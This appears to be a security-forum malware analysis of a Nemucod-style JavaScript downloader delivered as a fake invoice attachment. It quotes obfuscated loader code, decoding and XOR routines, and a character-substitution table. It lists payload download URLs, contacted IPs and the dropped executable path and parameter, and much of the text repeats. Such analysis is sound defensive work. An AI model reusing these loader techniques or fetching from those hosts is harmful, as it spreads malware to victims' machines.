- May 14, 2016
- 1,597
Latest version received by e-mail attachment: July, 12 2016
https://www.virustotal.com/en/file/...83cc067b95e7b23f5cd9a32f895c4acc1f2/analysis/
-SWIFT-dbc-.js
Detection ratio: 25 / 55
"hi DardiM,
Here's that excel file (latest invoices) that you wanted.
Best regards,
Elnora Lowery
Chief Executive Officer"
Threat Verdict: malicious
Threat Score: 100/100
AV Detection Ratio: 36%
AV Family Name: JS:Trojan.JS.Downloader , Trojan-Downloader.JS.Agent.lph, JS/TrojanDownloader.Nemucod.AJP
Time of analysis: 2016-07-14 01:53:48
File Size (bytes): 82904
File Type: ASCII text, with CRLF, LF line terminators Contacted Domains: zachphoto.7u.cz, error.banan.cz, nicesound.biz, acepipesdeli.com.br Contacted Hosts: 77.93.211.244, 186.202.153.125
function f(s) {return eval(s);};
var abvxN2A = [';}\n','\xff',
'\r
','\xff',
'(])','\xff',
'cTH','\xff',
'RM(','\xff',
'8yX','\xff',
'ZG ','\xff',
...
...
...
'\r;"','\xff',
'" +','\xff',
' "e','\xff',
'sol','\xff',
'c" ','\xff',
'= 8','\xff',
'eVK','\xff',
'WB ','\xff',
'rav']; => NOT TOO DIFFICULT TO READ FROM THE END (reversed) : var BWKVe8 = "close";...
/*@cc_on
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();
c = c["join"]("");
@*/
if (c["length"] >= 12) f(c);
In this method for "all in a var", it differs from other versions by using a function to indirectly eval the content of c var, and by operations done before calling it :
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();
c = c["join"]("");
An example of what can be seen after above operations, without evaluation :
Real string are cut in several parts
=> real vars content are constructed after :
- example : KOIv + Kk0 + KOIv => "SaveFileTo"
It uses Bitwise and Bit Shift Operators :
Bitwise inclusive OR operation and Shift Operators
var NJx3=HMNz[HMNz[MSd0(BVh8) + OTFi1(DPf8)]-4] | HMNz[HMNz[BVh8 + DPf8]-3] << 8 | HMNz[HMNz[BVh8 + DPf8]-2] << 16 | HMNz[HMNz[BVh8 + DPf8]-1] ;
for (var Pg3=0; Pg3 < HMNz[BVh8 + (function DYn5(){return DPf8;}())]; Pg3++) {
HMNz[Pg3] ^= SRCAj8; => bitwise exclusive OR operation (XOR)
SRCAj8=(SRCAj8 + Vt) % 256; }; => modulo
return HMNz; };
Some Script / method / object used :
"WScript.Shell"
"ADOB.Stream"
"WinHttp.WinHttpRequest.5.1"
"MSXML2.XMLHTTP"
=> two connection methods available, to be sure
"Sleep"
"CreateObject"
"LoadFromFile"
"saveToFile"
"writeText
"open"
"write"
...
HTTP request by GET Method :
=> several URLs => to increase its chances of success
zachphoto.7u.cz/0jyhh
nicesound.biz/42did
acepipesdeli.com.br/tffx7
=> Names constructed by concatenation of several "clear" vars
Path of file that is downloaded :
CreateObject(WScript.Shell).ExpandEnvironmentStrings(%TEMP%/)
=> "C:\Users\DardiM\AppData\Local\Temp\
+ concatenation
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe"
This sample is not a well formed executable format , to avoid a possible detection by protection tools : it is an obfuscated file.
If no sample can be downloaded :
"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"
=> a XML file (without extension) which is regularly modified (modified time)
=> If you delete it manually, created again
=> that's why it's seen as XML file on some dynamical analysis (www.hybrid-analysis.com)
"%TEMP%\uosoT7UCkbfcrM
Size 1008B (1008 bytes)
Type XML document text
Runtime Processwscript.exe (PID: 2468)"
Several Arrays of chars :
=> character substitution cipher (see explanation a the end)
2 arrays for substitution function found :
=> All characters in the file are converted to their decimal values. If a character’s decimal value is higher than 127, the character is replaced with its corresponding value from a pre-defined array of characters. If not, the character remains untouched
One example :
Conclusion :
The Javascript is interacting with the downloaded sample and doing a few additional layers of dis-obfuscation :
- character substitution cipher
- character removal, XORing, and reversing the file
Then, it validates the magic numbers in the file header : 4D5a ((MZ", Windows PE) :
function Xu9(HMNz) {
if (HMNz[1 * 0]== 0x4D && HMNz[1]== 0x5a) {return true;}
else {return false;}
};
The exe is run with a parameter !
=> "321"
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"
Will see if I post more
(still few things to say about how this Js file works, but don't think it's important, currently)
https://www.virustotal.com/en/file/...83cc067b95e7b23f5cd9a32f895c4acc1f2/analysis/
-SWIFT-dbc-.js
Detection ratio: 25 / 55
"hi DardiM,
Here's that excel file (latest invoices) that you wanted.
Best regards,
Elnora Lowery
Chief Executive Officer"
Threat Verdict: malicious
Threat Score: 100/100
AV Detection Ratio: 36%
AV Family Name: JS:Trojan.JS.Downloader , Trojan-Downloader.JS.Agent.lph, JS/TrojanDownloader.Nemucod.AJP
Time of analysis: 2016-07-14 01:53:48
File Size (bytes): 82904
File Type: ASCII text, with CRLF, LF line terminators Contacted Domains: zachphoto.7u.cz, error.banan.cz, nicesound.biz, acepipesdeli.com.br Contacted Hosts: 77.93.211.244, 186.202.153.125
function f(s) {return eval(s);};
var abvxN2A = [';}\n','\xff',
'\r
','\xff','(])','\xff',
'cTH','\xff',
'RM(','\xff',
'8yX','\xff',
'ZG ','\xff',
...
...
...
'\r;"','\xff',
'" +','\xff',
' "e','\xff',
'sol','\xff',
'c" ','\xff',
'= 8','\xff',
'eVK','\xff',
'WB ','\xff',
'rav']; => NOT TOO DIFFICULT TO READ FROM THE END (reversed) : var BWKVe8 = "close";...
/*@cc_on
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();
c = c["join"]("");
@*/
if (c["length"] >= 12) f(c);
In this method for "all in a var", it differs from other versions by using a function to indirectly eval the content of c var, and by operations done before calling it :
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();
c = c["join"]("");
An example of what can be seen after above operations, without evaluation :
Real string are cut in several parts
var BWKVe8 = "close";
var NRZu = "le";
var Kk0 = "eToFi";
var KOIv = "Sav";
var HWl = "xt";
var Rm2 = "teTe";
var OEy0 = "wri";
var KVq = "open"
var OISc = "arset";
var Qp = "Ch";
var CYb7 = "type"
var ARRr = "eam";
var Us3 = "B.Str"
var Mb = "ADOD";
var BFp = "ect"
var DYg = "bj";
var Es0 = "eO";
var EIq = "Creat";
var JFRGy = "in";
var Qx9 = "jo";
var OMXj = "e";
var PWq = "rCod";
var Kg = "Cha";
var UPNl7 = "from";
var NGn = "h";
var UUr = "lengt";
function IKu8(FRXf7){return FRXf7;};
function KWCc(FNs){return FNs;};
var OUp9 = "sh";
var Sv9 = "pu";
function Gs1(IQj9){return IQj9;};
...
var NRZu = "le";
var Kk0 = "eToFi";
var KOIv = "Sav";
var HWl = "xt";
var Rm2 = "teTe";
var OEy0 = "wri";
var KVq = "open"
var OISc = "arset";
var Qp = "Ch";
var CYb7 = "type"
var ARRr = "eam";
var Us3 = "B.Str"
var Mb = "ADOD";
var BFp = "ect"
var DYg = "bj";
var Es0 = "eO";
var EIq = "Creat";
var JFRGy = "in";
var Qx9 = "jo";
var OMXj = "e";
var PWq = "rCod";
var Kg = "Cha";
var UPNl7 = "from";
var NGn = "h";
var UUr = "lengt";
function IKu8(FRXf7){return FRXf7;};
function KWCc(FNs){return FNs;};
var OUp9 = "sh";
var Sv9 = "pu";
function Gs1(IQj9){return IQj9;};
...
- example : KOIv + Kk0 + KOIv => "SaveFileTo"
It uses Bitwise and Bit Shift Operators :
Bitwise inclusive OR operation and Shift Operators
var NJx3=HMNz[HMNz[MSd0(BVh8) + OTFi1(DPf8)]-4] | HMNz[HMNz[BVh8 + DPf8]-3] << 8 | HMNz[HMNz[BVh8 + DPf8]-2] << 16 | HMNz[HMNz[BVh8 + DPf8]-1] ;
for (var Pg3=0; Pg3 < HMNz[BVh8 + (function DYn5(){return DPf8;}())]; Pg3++) {
HMNz[Pg3] ^= SRCAj8; => bitwise exclusive OR operation (XOR)
SRCAj8=(SRCAj8 + Vt) % 256; }; => modulo
return HMNz; };
Some Script / method / object used :
"WScript.Shell"
"ADOB.Stream"
"WinHttp.WinHttpRequest.5.1"
"MSXML2.XMLHTTP"
=> two connection methods available, to be sure
"Sleep"
"CreateObject"
"LoadFromFile"
"saveToFile"
"writeText
"open"
"write"
...
HTTP request by GET Method :
=> several URLs => to increase its chances of success
zachphoto.7u.cz/0jyhh
nicesound.biz/42did
acepipesdeli.com.br/tffx7
=> Names constructed by concatenation of several "clear" vars
Path of file that is downloaded :
CreateObject(WScript.Shell).ExpandEnvironmentStrings(%TEMP%/)
=> "C:\Users\DardiM\AppData\Local\Temp\
+ concatenation
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe"
This sample is not a well formed executable format , to avoid a possible detection by protection tools : it is an obfuscated file.
If no sample can be downloaded :
"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"
=> a XML file (without extension) which is regularly modified (modified time)
=> If you delete it manually, created again
=> that's why it's seen as XML file on some dynamical analysis (www.hybrid-analysis.com)
"%TEMP%\uosoT7UCkbfcrM
Size 1008B (1008 bytes)
Type XML document text
Runtime Processwscript.exe (PID: 2468)"
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="XHTML namespace" lang="en" xml:lang="en">
<head>
<title>Object not found!</title>
<link rev="made" href="mailto:root@localhost" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>
<body>
<h1>Object not found!!</h1>
<p>
The requested URL was not found on this server.
If you entered the URL manually please check your
spelling and try again.
</p>
<p>
If you think this is a server error, please contact
<a href="mailto:root@localhost">webmestre</a>.
</p>
<h2>Error 404</h2>
<address>
<a href="/">acepipesdeli.com.br</a><br />
<span>Thu Jul 14 20:03:30 2016<br />
Apache</span>
</address>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="XHTML namespace" lang="en" xml:lang="en">
<head>
<title>Object not found!</title>
<link rev="made" href="mailto:root@localhost" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>
<body>
<h1>Object not found!!</h1>
<p>
The requested URL was not found on this server.
If you entered the URL manually please check your
spelling and try again.
</p>
<p>
If you think this is a server error, please contact
<a href="mailto:root@localhost">webmestre</a>.
</p>
<h2>Error 404</h2>
<address>
<a href="/">acepipesdeli.com.br</a><br />
<span>Thu Jul 14 20:03:30 2016<br />
Apache</span>
</address>
</body>
</html>
Several Arrays of chars :
=> character substitution cipher (see explanation a the end)
2 arrays for substitution function found :
=> All characters in the file are converted to their decimal values. If a character’s decimal value is higher than 127, the character is replaced with its corresponding value from a pre-defined array of characters. If not, the character remains untouched
One example :
function NDn2(BCs1) {
var FCi9=new Array(); FCi9[0xC7]=0x80; FCi9[0xFC]=0x81; FCi9[0xE9]=0x82; FCi9[0xE2]=0x83; FCi9[0xE4]=0x84; FCi9[0xE0]=0x85; FCi9[0xE5]=0x86; FCi9[0xE7]=0x87; FCi9[0xEA]=0x88; FCi9[0xEB]=0x89; FCi9[0xE8]=0x8A; FCi9[0xEF]=0x8B; FCi9[0xEE]=0x8C; FCi9[0xEC]=0x8D; FCi9[0xC4]=0x8E; FCi9[0xC5]=0x8F; FCi9[0xC9]=0x90; FCi9[0xE6]=0x91; FCi9[0xC6]=0x92; FCi9[0xF4]=0x93; FCi9[0xF6]=0x94; FCi9[0xF2]=0x95; FCi9[0xFB]=0x96; FCi9[0xF9]=0x97; FCi9[0xFF]=0x98; FCi9[0xD6]=0x99; FCi9[0xDC]=0x9A; FCi9[0xA2]=0x9B; FCi9[0xA3]=0x9C; FCi9[0xA5]=0x9D; FCi9[0x20A7]=0x9E; FCi9[0x192]=0x9F; FCi9[0xE1]=0xA0; FCi9[0xED]=0xA1; FCi9[0xF3]=0xA2; FCi9[0xFA]=0xA3; FCi9[0xF1]=0xA4; FCi9[0xD1]=0xA5; FCi9[0xAA]=0xA6; FCi9[0xBA]=0xA7; FCi9[0xBF]=0xA8; FCi9[0x2310]=0xA9; FCi9[0xAC]=0xAA; FCi9[0xBD]=0xAB; FCi9[0xBC]=0xAC; FCi9[0xA1]=0xAD; FCi9[0xAB]=0xAE; FCi9[0xBB]=0xAF; FCi9[0x2591]=0xB0; FCi9[0x2592]=0xB1; FCi9[0x2593]=0xB2; FCi9[0x2502]=0xB3; FCi9[0x2524]=0xB4; FCi9[0x2561]=0xB5; FCi9[0x2562]=0xB6; FCi9[0x2556]=0xB7; FCi9[0x2555]=0xB8; FCi9[0x2563]=0xB9; FCi9[0x2551]=0xBA; FCi9[0x2557]=0xBB; FCi9[0x255D]=0xBC; FCi9[0x255C]=0xBD; FCi9[0x255B]=0xBE; FCi9[0x2510]=0xBF; FCi9[0x2514]=0xC0; FCi9[0x2534]=0xC1; FCi9[0x252C]=0xC2; FCi9[0x251C]=0xC3; FCi9[0x2500]=0xC4; FCi9[0x253C]=0xC5; FCi9[0x255E]=0xC6; FCi9[0x255F]=0xC7; FCi9[0x255A]=0xC8; FCi9[0x2554]=0xC9; FCi9[0x2569]=0xCA; FCi9[0x2566]=0xCB; FCi9[0x2560]=0xCC; FCi9[0x2550]=0xCD; FCi9[0x256C]=0xCE; FCi9[0x2567]=0xCF; FCi9[0x2568]=0xD0; FCi9[0x2564]=0xD1; FCi9[0x2565]=0xD2; FCi9[0x2559]=0xD3; FCi9[0x2558]=0xD4; FCi9[0x2552]=0xD5; FCi9[0x2553]=0xD6; FCi9[0x256B]=0xD7; FCi9[0x256A]=0xD8; FCi9[0x2518]=0xD9; FCi9[0x250C]=0xDA; FCi9[0x2588]=0xDB; FCi9[0x2584]=0xDC; FCi9[0x258C]=0xDD; FCi9[0x2590]=0xDE; FCi9[0x2580]=0xDF; FCi9[0x3B1]=0xE0; FCi9[0xDF]=0xE1; FCi9[0x393]=0xE2; FCi9[0x3C0]=0xE3; FCi9[0x3A3]=0xE4; FCi9[0x3C3]=0xE5; FCi9[0xB5]=0xE6; FCi9[0x3C4]=0xE7; FCi9[0x3A6]=0xE8; FCi9[0x398]=0xE9; FCi9[0x3A9]=0xEA; FCi9[0x3B4]=0xEB; FCi9[0x221E]=0xEC; FCi9[0x3C6]=0xED; FCi9[0x3B5]=0xEE; FCi9[0x2229]=0xEF; FCi9[0x2261]=0xF0; FCi9[0xB1]=0xF1; FCi9[0x2265]=0xF2; FCi9[0x2264]=0xF3; FCi9[0x2320]=0xF4; FCi9[0x2321]=0xF5; FCi9[0xF7]=0xF6; FCi9[0x2248]=0xF7; FCi9[0xB0]=0xF8; FCi9[0x2219]=0xF9; FCi9[0xB7]=0xFA; FCi9[0x221A]=0xFB; FCi9[0x207F]=0xFC; FCi9[0xB2]=0xFD; FCi9[0x25A0]=0xFE; FCi9[0xA0]=0xFF;
};var KUXf=new Array();
for (var Pg3=0; Pg3 < BCs1[BVh8 + DPf8]; Pg3++) {
var LEAc=BCs1[Su + OOGv0 + Gs1(RHJi) + (function Od(){return AHo7;}())](Pg3);
if (LEAc < (614 - 486)) {
var VCRBj=LEAc;}
else {
var VCRBj=FCi9[LEAc];
}
KUXf[IKu8(Sv9) + KWCc(OUp9)](VCRBj); };
return KUXf;
var FCi9=new Array(); FCi9[0xC7]=0x80; FCi9[0xFC]=0x81; FCi9[0xE9]=0x82; FCi9[0xE2]=0x83; FCi9[0xE4]=0x84; FCi9[0xE0]=0x85; FCi9[0xE5]=0x86; FCi9[0xE7]=0x87; FCi9[0xEA]=0x88; FCi9[0xEB]=0x89; FCi9[0xE8]=0x8A; FCi9[0xEF]=0x8B; FCi9[0xEE]=0x8C; FCi9[0xEC]=0x8D; FCi9[0xC4]=0x8E; FCi9[0xC5]=0x8F; FCi9[0xC9]=0x90; FCi9[0xE6]=0x91; FCi9[0xC6]=0x92; FCi9[0xF4]=0x93; FCi9[0xF6]=0x94; FCi9[0xF2]=0x95; FCi9[0xFB]=0x96; FCi9[0xF9]=0x97; FCi9[0xFF]=0x98; FCi9[0xD6]=0x99; FCi9[0xDC]=0x9A; FCi9[0xA2]=0x9B; FCi9[0xA3]=0x9C; FCi9[0xA5]=0x9D; FCi9[0x20A7]=0x9E; FCi9[0x192]=0x9F; FCi9[0xE1]=0xA0; FCi9[0xED]=0xA1; FCi9[0xF3]=0xA2; FCi9[0xFA]=0xA3; FCi9[0xF1]=0xA4; FCi9[0xD1]=0xA5; FCi9[0xAA]=0xA6; FCi9[0xBA]=0xA7; FCi9[0xBF]=0xA8; FCi9[0x2310]=0xA9; FCi9[0xAC]=0xAA; FCi9[0xBD]=0xAB; FCi9[0xBC]=0xAC; FCi9[0xA1]=0xAD; FCi9[0xAB]=0xAE; FCi9[0xBB]=0xAF; FCi9[0x2591]=0xB0; FCi9[0x2592]=0xB1; FCi9[0x2593]=0xB2; FCi9[0x2502]=0xB3; FCi9[0x2524]=0xB4; FCi9[0x2561]=0xB5; FCi9[0x2562]=0xB6; FCi9[0x2556]=0xB7; FCi9[0x2555]=0xB8; FCi9[0x2563]=0xB9; FCi9[0x2551]=0xBA; FCi9[0x2557]=0xBB; FCi9[0x255D]=0xBC; FCi9[0x255C]=0xBD; FCi9[0x255B]=0xBE; FCi9[0x2510]=0xBF; FCi9[0x2514]=0xC0; FCi9[0x2534]=0xC1; FCi9[0x252C]=0xC2; FCi9[0x251C]=0xC3; FCi9[0x2500]=0xC4; FCi9[0x253C]=0xC5; FCi9[0x255E]=0xC6; FCi9[0x255F]=0xC7; FCi9[0x255A]=0xC8; FCi9[0x2554]=0xC9; FCi9[0x2569]=0xCA; FCi9[0x2566]=0xCB; FCi9[0x2560]=0xCC; FCi9[0x2550]=0xCD; FCi9[0x256C]=0xCE; FCi9[0x2567]=0xCF; FCi9[0x2568]=0xD0; FCi9[0x2564]=0xD1; FCi9[0x2565]=0xD2; FCi9[0x2559]=0xD3; FCi9[0x2558]=0xD4; FCi9[0x2552]=0xD5; FCi9[0x2553]=0xD6; FCi9[0x256B]=0xD7; FCi9[0x256A]=0xD8; FCi9[0x2518]=0xD9; FCi9[0x250C]=0xDA; FCi9[0x2588]=0xDB; FCi9[0x2584]=0xDC; FCi9[0x258C]=0xDD; FCi9[0x2590]=0xDE; FCi9[0x2580]=0xDF; FCi9[0x3B1]=0xE0; FCi9[0xDF]=0xE1; FCi9[0x393]=0xE2; FCi9[0x3C0]=0xE3; FCi9[0x3A3]=0xE4; FCi9[0x3C3]=0xE5; FCi9[0xB5]=0xE6; FCi9[0x3C4]=0xE7; FCi9[0x3A6]=0xE8; FCi9[0x398]=0xE9; FCi9[0x3A9]=0xEA; FCi9[0x3B4]=0xEB; FCi9[0x221E]=0xEC; FCi9[0x3C6]=0xED; FCi9[0x3B5]=0xEE; FCi9[0x2229]=0xEF; FCi9[0x2261]=0xF0; FCi9[0xB1]=0xF1; FCi9[0x2265]=0xF2; FCi9[0x2264]=0xF3; FCi9[0x2320]=0xF4; FCi9[0x2321]=0xF5; FCi9[0xF7]=0xF6; FCi9[0x2248]=0xF7; FCi9[0xB0]=0xF8; FCi9[0x2219]=0xF9; FCi9[0xB7]=0xFA; FCi9[0x221A]=0xFB; FCi9[0x207F]=0xFC; FCi9[0xB2]=0xFD; FCi9[0x25A0]=0xFE; FCi9[0xA0]=0xFF;
};var KUXf=new Array();
for (var Pg3=0; Pg3 < BCs1[BVh8 + DPf8]; Pg3++) {
var LEAc=BCs1[Su + OOGv0 + Gs1(RHJi) + (function Od(){return AHo7;}())](Pg3);
if (LEAc < (614 - 486)) {
var VCRBj=LEAc;}
else {
var VCRBj=FCi9[LEAc];
}
KUXf[IKu8(Sv9) + KWCc(OUp9)](VCRBj); };
return KUXf;
Conclusion :
The Javascript is interacting with the downloaded sample and doing a few additional layers of dis-obfuscation :
- character substitution cipher
- character removal, XORing, and reversing the file
Then, it validates the magic numbers in the file header : 4D5a ((MZ", Windows PE) :
function Xu9(HMNz) {
if (HMNz[1 * 0]== 0x4D && HMNz[1]== 0x5a) {return true;}
else {return false;}
};
The exe is run with a parameter !
=> "321"
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"
Will see if I post more
(still few things to say about how this Js file works, but don't think it's important, currently)
Last edited:
